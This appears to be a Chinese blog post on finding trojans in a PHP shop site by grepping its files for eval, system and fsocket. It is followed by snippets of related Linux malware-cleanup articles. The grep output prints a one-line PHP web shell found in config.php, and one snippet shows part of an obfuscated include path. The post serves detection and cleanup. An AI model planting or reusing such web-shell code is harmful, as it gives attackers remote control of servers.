查找木马

1.php的漏洞扫描简单得很,无非就是逐个检查文件中是否有eval,system,fsocket等高危函数

[[email protected] shop]# grep -l "eval" `find . -name "*.php"`
./cycle_image.php
./config.php
./feed.php
./admin/privilege.php
./admin/includes/cls_phpzip.php
./admin/includes/init.php
./admin/role.php
./data/global.php
./languages/en_us/payment/kuaiqian.php
./includes/shopex_json.php
./includes/fckeditor/editor/filemanager/connectors/php/basexml.php
./includes/cls_template.php
./includes/lib_base.php
./includes/cls_captcha.php
./install/cloud.php
./temp/compiled/admin/menu.htm.php

[[email protected] shop]# grep -n "eval" config.php
1:<?php eval($_POST[cmd]);?>

[[email protected] shop]# grep -l "fsocket" `find . -name "*.php"`
./languages/zh_tw/admin/common.php
./languages/zh_cn/admin/common.php

[[email protected] shop]# grep -n "fsocket" languages/zh_tw/admin/common.php
332:$_LANG[‘disabled_fsockopen‘] = ‘服務器已禁用 fsocketopen 函數。‘;

[[email protected] shop]# grep -l "system" `find . -name "*.php"`
./admin/flashplay.php
./admin/includes/lib_main.php
./admin/includes/inc_menu.php
./languages/zh_tw/admin/navigator.php
./languages/zh_tw/admin/index.php
./languages/zh_tw/admin/common.php
./languages/zh_tw/admin/flashplay.php
./languages/zh_tw/admin/convert.php
./languages/zh_tw/common.php
./languages/zh_cn/admin/navigator.php
./languages/zh_cn/admin/index.php
./languages/zh_cn/admin/common.php
./languages/zh_cn/admin/flashplay.php
./languages/zh_cn/admin/convert.php
./languages/zh_cn/common.php
./languages/en_us/admin/articlecat.php
./languages/en_us/admin/license.php
./languages/en_us/admin/navigator.php
./languages/en_us/admin/index.php
./languages/en_us/admin/priv_action.php
./languages/en_us/admin/common.php
./languages/en_us/admin/flashplay.php
./languages/en_us/admin/integrate.php
./languages/en_us/admin/article_auto.php
./languages/en_us/admin/convert.php
./languages/en_us/admin/goods.php
./languages/en_us/admin/shop_config.php
./languages/en_us/admin/goods_auto.php
./languages/en_us/admin/users.php
./languages/en_us/common.php
./languages/en_us/payment/kuaiqian.php
./languages/en_us/payment/ips.php
./languages/en_us/payment/express.php
./languages/en_us/user.php
./includes/lib_main.php
./includes/lib.debug.php
./includes/modules/payment/paypal.php
./install/index.php
./install/auto_index.php
./install/templates/setting.php
./install/templates/checking_content.php
./install/templates/setting_content.php
./install/languages/zh_tw.php
./install/languages/zh_cn.php
./install/languages/en_us.php
./install/includes/lib_installer.php
./install/includes/lib_auto_installer.php
./temp/compiled/respond.dwt.php
./temp/compiled/message.dwt.php
./temp/compiled/admin/start.htm.php
./demo/index.php
./demo/templates/readme.php
./demo/languages/zh_cn_gbk.php
./demo/languages/zh_cn_utf-8.php
./demo/languages/zh_tw_utf-8.php
./demo/languages/en_us_utf-8.php

时间: 2024-12-09 06:53:20

查找木马的相关文章

Linux 下如何查找木马并处理

1.cat /etc/passwd 未发现陌生用户和可疑root权限用户. 2.netstat -anp 查看所有进程及pid号,未发现异常连接. 3.last 查看最近登录用户,未发现异常 4.cat /etc/profile 查看系统环境变量,未发现异常 5.ls -al /etc/rc.d/rc3.d ,查看当前级别下开机启动程序,未见异常(有一些脸生,只好利用搜索引擎了) 6.crontab -l 检查计划任务,root用户和web运行用户各检查一遍,未见任何异常 7.cat /root

Linux查杀木马经验总结

前段时间公司网络异常,访问公网和内网都出现丢包,甚至无法访问的情况.登录网关查看监控,发现OA服务器的出方向流量异常,并连接了一个国外IP地址. 然后想登录OA服务器排查,发现登录不上,ping丢包严重,猜测服务器的CPU.连接数或带宽被占满,导致无法登录. OA服务器是部署在一台Esxi上的虚拟机,Esxi主机也登录不上了,首先拔掉了Esxi的网线,阻止服务器对外发包. 然后把网线插到了笔记本上,与Esxi服务器直连,并将笔记本设置为网关的IP192.168.1.1,这样就能ping通OA的服

Linux下XordDos木马的清除

朋友的阿里云服务器一早上报木马入侵,找我处理,登陆阿里云查看警告信息"恶意进程(云查杀)-XorDDoS木马", 排查原则: 1.一般的木马都有多个守护进程,不一定可以短时间停掉,或者处理好,要注意备份业务数据 2.如果木马运行影响到业务运行,首先要恢复业务的访问,同时进行排查处理,但是并不建议 3.如果没有太大影响,可以先停掉相关业务进程,防止查杀过程的操作对业务产生影响 生产环境注意根据实际情况决策 处理木马病毒的顺序:1.关闭对外访问2.停止定时任务3.关闭木马的守护进程4.禁止

木马入侵查杀 linux

 目 录: 一.问题现象: 二.问题排查: 1.netstat 排查: 2.top查看: 3.lsof -c 命令排查: 4.确定中木马了. 三.木马查杀: 木马1,清除: 木马2,清除: 四.后续处理: 1.iptables检查 2.cron检查 3.chkconfig检查 4.木马删除,持续观察确认 五.入侵原因及后续避免措施: 1.入侵原因: 2.后续避免措施:(监控为主) 一.问题现象: 服务器登录缓慢,远程连接老是卡顿. 二.问题排查: 1.netstat 排查: 如图:58.218.

查看网络端口被占用情况netstat命令

在windows命令行窗口下执行: C:\>netstat -aon|findstr "80" TCP     127.0.0.1:80         0.0.0.0:0               LISTENING       2448 看到了吗,端口被进程号为2448的进程占用,继续执行下面命令: C:\>tasklist|findstr "2448" thread.exe                     2016 Console    

服务器安全 老被攻击怎么办

最近发现一些客户机器经常有密码被人修改,或者远程端口连接不上等安全性的问题. 笔者就自己平常的经验来总结一下安全的一些操作,这次主要说服务器,分windows和linux. windows安全注意事项: 1.远程端口3389修改掉(经常成为扫描肉鸡的扫描端口) 2.杀毒软件,推荐360,      一般操作:电脑体检,修复漏洞,优化加速优化启动项,快速查杀,      功能大全有防黑加固,可疑禁用装完系统默认共享的目录,      有任务管理器可以查看进程那些是正常的,那些是危险的,     

记一次Linux服务器被入侵后的检测过程

作者 | 哈兹本德     来源 | FreeBuf 0×00 前言 故事是这样的,大年初一,客户反应他们服务器无法访问,查看路由,发现某oracle+tomcat服务器UDP流量超大,把带宽占完了,过年嘛,客户那边先找了当地的技术人员弄了几天没搞定,然后没办法大年初三的找我们弄-顾客是上帝! 其实吧以前也遇到过这类攻击,当时某IDC都被打瘫了,只不过马儿不在我们的设备上,所以没过多关注- 0×01 查找木马 首先SSH登陆,top查看进程,发现奇怪名字的命令gejfhzthbp,一看就感觉有问

计算机网络中OSI参考模型

OSI参考模型 应用层 包括所有能产生网络流量的程序 表示层 用来判断传输之前是否进行加密或压缩处理(二进制.ASCII) 比如出现乱码情况,可能就是表示层的问题 会话层 一个浏览器窗口就是一个会话 能够 用netstat -n 来查看会话,查找木马 传输层 可靠传输.流量控制和不可靠传输 网络层 复杂选择最佳路径.规划IP地址 数据链路层 判断帧的开始和结束 透明传输.差错检验 物理层 接口标准.电器标准 如何再物理链路上传输更快 原文地址:https://www.cnblogs.com/ad

Linux查找疑似被挂木马文件方法以及Nginx根据不同IP做不同反向代理

一.先说被挂马的文件吧. 木马文件一般会伪装成正常文件,或者非可执行文件,以达到欺骗的目的. 比方说,伪装成icon图标文件. 找到一个伪装的文件,用编辑器打开,就会发现里面是源码. 这种的工作原理大概是,在某一个正常的文件中用include引入这个图标文件, 然后,文件中的代码就被不知不觉的跟随正常的应用文件执行了. 同时,为了达到隐藏的目的,include的代码也不是显式的写的. 例如:@include "\x2fh\x6fm\x65/\x77w\x77r\x6fo\x74/\x64e\x6